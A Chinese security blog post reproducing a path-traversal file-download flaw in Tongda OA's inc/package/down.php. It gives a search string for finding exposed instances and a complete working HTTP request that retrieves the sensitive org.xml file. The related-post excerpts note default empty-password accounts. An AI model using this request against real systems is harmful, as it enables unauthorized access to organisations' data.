【漏洞复现】通达OA inc/package/down.php接口未授权漏洞

已于 2024-05-26 16:20:48 修改
阅读量374 收藏 5
点赞数 8
分类专栏: 漏洞复现 文章标签: 网络安全 web安全
于 2024-05-26 15:44:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42620428/article/details/139215646
版权

1 产品简介

通达OA(Office Anywhere网络智能办公系统)是由通达信科科技自主研发的协同办公自动化软件,是与中国企业管理实践相结合形成的综合管理办公平台。通达OA为各行业不同规模的众多用户提供信息化管理能力,包括流程审批、行政办公、日常事务、数据统计分析、即时通讯、移动办公等,帮助广大用户降低沟通和管理成本,提升生产和决策效率。

2 漏洞描述

通达OA(Office Anywhere网络智能办公系统)存在inc/package/down.php接口未授权漏洞。攻击者可以通过构造/inc/package/down.php?id=…/…/…/cache/org可以下载org.xml文件,获取敏感信息。

3 产品主页

body=“通达OA”
在这里插入图片描述

4 漏洞复现

GET /inc/package/down.php?id=../../../cache/org HTTP/1.1
Host: {{Hostname}}
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

导致敏感信息泄露
在这里插入图片描述

5 修复建议

建议联系软件厂商进行处理

小菜农呀
关注
  • 8
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
漏洞复现-通达OA通达OA get_contactlist.php 敏感信息泄漏漏洞
xiaokp7的博客
02-18 355
通达OA get_contactlist.php文件存在信息泄漏漏洞,攻击者通过漏洞可以获取敏感信息,进一步攻击。
复现通达OA down.php文件下载漏洞_10
fushuang333的博客
01-06 998
复现通达OA down.php授权下载漏洞通达OA是由北京通达信科科技有限公司自主研发的协同办公自动化软件,是与中国企业管理实践相结合形成的综合管理办公平台。
OA 审计小记
YJ_12340的博客
09-08 1252
通达oa 作为攻防演练中出场率较高的一套 OA 系统,决定先从历史漏洞开始挖掘分析,对通达oa 有一个初步的了解通达oa 11.9 的下载地址 默认安装地址是 D:\MYOA 联网状态下会自动更新到通达 oa 11.10安装成功后,登录界面如下 默认账号为 admin 对应密码为空登录后我们看到其中还有一些默认账号 lijia wangyun wangde 均可利用空密码登录成功。
通达OA inc/package/down.php接口存在授权访问漏洞
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
12-04 660
通达OA(Office Anywhere网络智能办公系统)是由通达信科科技自主研发的协同办公自动化软件,是与中国企业管理实践相结合形成的综合管理办公平台。通达OA为各行业不同规模的众多用户提供信息化管理能力,包括流程审批、行政办公、日常事务、数据统计分析、即时通讯、移动办公等,帮助广大用户降低沟通和管理成本,提升生产和决策效率。此外,通达OA通过融合不同的信息化资源,打通信息“孤岛”,精细化流程管理,改善管理模式,实现资源的优化配置和高效运转,全面提升企业竞争力。
通达OA11.4漏洞复现授权访问)
weixin_51716781的博客
05-10 1438
通达OA11.4漏洞复现授权访问) 本文章仅限于渗透测试使用,如出问题与作者无关,请不要做违法操作 1:在虚拟机上安装通达OA11.4版本,查看虚拟机ip 192.168.78.159 2:访问ispirit/login_code.php 获取codeuid 如图:记住UID后面使用 3:访问/logincheck_code.php文件并使用bp抓包 4:在bp中需要修改数据:2个地方:1:修改为POST包,添加UID(注意事项:返回的包中status返回是1则成功,如果是0则失败) 5:把获取的
漏洞复现-通达OA通达OA down 授权员工信息泄露漏洞
xiaokp7的博客
02-18 204
通达OA(Office Anywhere网络智能办公系统)是中国通达公司的一套协同办公自动化软件。通达OA down 授权员工信息泄露漏洞
通达OA inc/package/down.php接口存在授权访问漏洞 附POC
nnn2188185的博客
11-28 399
通达OA(Office Anywhere网络智能办公系统)是由通达信科科技自主研发的协同办公自动化软件,是与中国企业管理实践相结合形成的综合管理办公平台。通达OA为各行业不同规模的众多用户提供信息化管理能力,包括流程审批、行政办公、日常事务、数据统计分析、即时通讯、移动办公等,帮助广大用户降低沟通和管理成本,提升生产和决策效率。
通达OA授权任意文件上传及文件包含漏洞分析学习
A1andNS's Blog
08-30 3162
今年3月份通达OA爆出了文件上传和文件包含漏洞,网络上很多复现和分析的博客,今天我也来试着分析分析,据360灵腾安全实验室判断该漏洞等级为高,利用难度低,威胁程度高,所以可能比较适合代码审计的新手来练练。 0x00 漏洞概述 通达OA(Office Anywhere网络智能办公系统)是由北京通达信科科技有限公司自主研发的协同办公自动化系统,包括流程审批、行政办公、日常事务、数据统计分析、即时通讯、移动办公等。 该漏洞在绕过身份验证的情况下通过文件上传漏洞上传恶意php文件,组合文件包含漏洞最终造成远程代码执
通达OA inc/package/down.php接口授权访问漏洞复现 [附POC]
薛定谔嘚喵博客
11-29 1414
通达OA 接口inc/package/down.php存在授权访问漏洞,该漏洞源于系统对用户传入的数据过滤不严。攻击者可借助特制的HTTP请求利用该漏洞访问敏感文件,造成信息泄露。
php授权访问漏洞
qq_42307546的博客
12-10 682
php授权
通达OA漏洞分析合集
不忘初心,护天下安全!
06-21 4195
通达OA是一套使用比较广泛的办公系统。随着国家护网的开展,通达OA成为渗透人员优先尝试的目标,暴露出了大量漏洞,以下进行介绍。判断通达版本爆破用户、邮箱GET 参数可获取username、email获得计算机名 通达OA v2014 app="TDXK-通达OA" app="TDXK-通达OA" && (title="2013" || title="2015")通达OA v2014 get_contactlist.php文件存在信息泄漏漏洞,攻击者通过漏洞可以获取敏
漏洞复现通达OA inc/package/down.php接口存在授权访问漏洞 附POC
失心少年
11-30 1092
通达OA为各行业不同规模的众多用户提供信息化管理能力,包括流程审批、行政办公、日常事务、数据统计分析、即时通讯、移动办公等,帮助广大用户降低沟通和管理成本,提升生产和决策效率。此外,通达OA通过融合不同的信息化资源,打通信息“孤岛”,精细化流程管理,改善管理模式,实现资源的优化配置和高效运转,全面提升企业竞争力。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。漏洞链接:http://127.0.0.1/inc/package/down.php?/cache/org。
OA系统审计小记
蚁景网安学院
09-01 1075
一般我们想要寻找一些高危的漏洞,就是需要寻找一些授权漏洞,就是在登录状态下也可以执行授权后的相关功能,编写了一个简单的脚本,先判断哪一些网页是可以在授权的情况下进行访问到,然后再做进一步的分析。......
漏洞复现-通达OA通达OA WHERE_STR 存在前台SQL注入漏洞
xiaokp7的博客
02-18 439
通达OA(Office Anywhere网络智能办公系统)是由北京通达信科科技有限公司自主研发的协同办公自动化软件,是与中国企业管理实践相结合形成的综合管理办公平台。通达OA WHERE_STR存在前台SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8332
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
网络安全测评技术与标准
weixin_48579910的博客
07-06 1333
网络安全测评通过多种方法和工具对系统、网络和应用程序进行全面评估,以发现和修复潜在的安全漏洞,确保其符合安全标准和政策。结合渗透测试、漏洞扫描、安全审计、风险评估、合规性测试、代码审查、社会工程测试、配置评估和基准测试等多种类型的测评,组织可以全面提升其网络安全防护能力,保护其信息资产和业务连续性。网络安全测评流程包括准备阶段、信息收集阶段、漏洞扫描阶段、渗透测试阶段、安全审计阶段、风险评估阶段、报告阶段、修复和验证阶段以及持续监控和改进阶段。
从资金到来:技术融资如何重塑IT顾问在AI与网络安全的角色?
07-07 647
一方面是人工智能 (AI) 和机器学习 (ML) 的双引擎,另一方面是网络安全和数据泄露威胁中不断变化的威胁形势,IT 格局正在经历翻天覆地的变化。这场数字革命对 IT 顾问来说既是挑战也是机遇,但要成功驾驭它,需要不断学习和技能发展。这就是 IT 顾问的技术资金成为游戏规则改变者的地方,为这些高需求领域的职业发展提供了关键的燃料。全球格局虽然重点一直放在成熟国家的技术资金上,但认...
网络设备安全
最新发布
weixin_48579910的博客
07-11 844
交换机作为网络核心设备,其安全性直接影响到整个网络的稳定和安全。通过实施身份验证和访问控制、设备配置安全、VLAN安全、ARP欺骗防护、MAC地址安全、DHCP欺骗防护、STP安全、拒绝服务防护以及固件和软件更新等措施,可以有效防范各种安全威胁。结合使用适当的安全工具和技术,组织可以大幅提高其交换机的安全防护能力,保护网络基础设施和数据的安全。定期进行安全审计和更新,确保交换机和网络始终处于最佳安全状态。确保路由器的安全是保护整个网络基础设施和数据传输安全的关键。
通达oa inc/package/down.php
12-21
通达OA Inc./package/down.php通达OA办公自动化软件中的一个文件路径。通达OA是一款企业办公管理系统,可以帮助企业实现办公自动化、流程管理、审批管理等各项功能。而down.php则是通达OA中用于下载文件的脚本文件。 在通达OA中,down.php主要用于用户在系统中下载文件的功能。当用户需要下载某个文件时,系统会调用down.php文件,通过该文件向用户提供下载链接或直接下载文件。通过down.php,用户可以方便地获取所需文件,提高工作效率和便捷性。 通过down.php,用户可以进行文件下载的相关操作,例如浏览系统中可下载的文件列表,选择需要下载的文件,以及查看文件的相关信息等。这一功能有助于用户管理和利用企业中的各类文件和资料,提高工作的效率和便捷性。 总之,通达OA Inc./package/down.php通达OA软件中用于文件下载功能的一个重要文件路径,通过该文件,用户可以方便地进行文件下载操作,提高办公效率和便捷性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小菜农呀

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值